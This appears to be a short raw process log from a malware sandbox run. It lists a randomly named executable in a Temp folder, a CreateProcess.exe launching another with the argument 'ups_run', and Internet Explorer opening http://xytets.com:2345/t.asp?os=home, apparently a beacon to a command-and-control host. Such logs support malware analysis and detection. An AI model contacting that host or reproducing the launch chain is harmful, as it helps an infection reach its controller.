3a193231bf5d75e4_i_pnhfaxsqki.exe "C:\Users\Administrator\AppData\Local\Temp\3a193231bf5d75e4_i_pnhfaxsqki.exe"
1964CreateProcess.exe C:\temp\CreateProcess.exe C:\Temp\hbztrmjecw.exe ups_run
1164iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
3052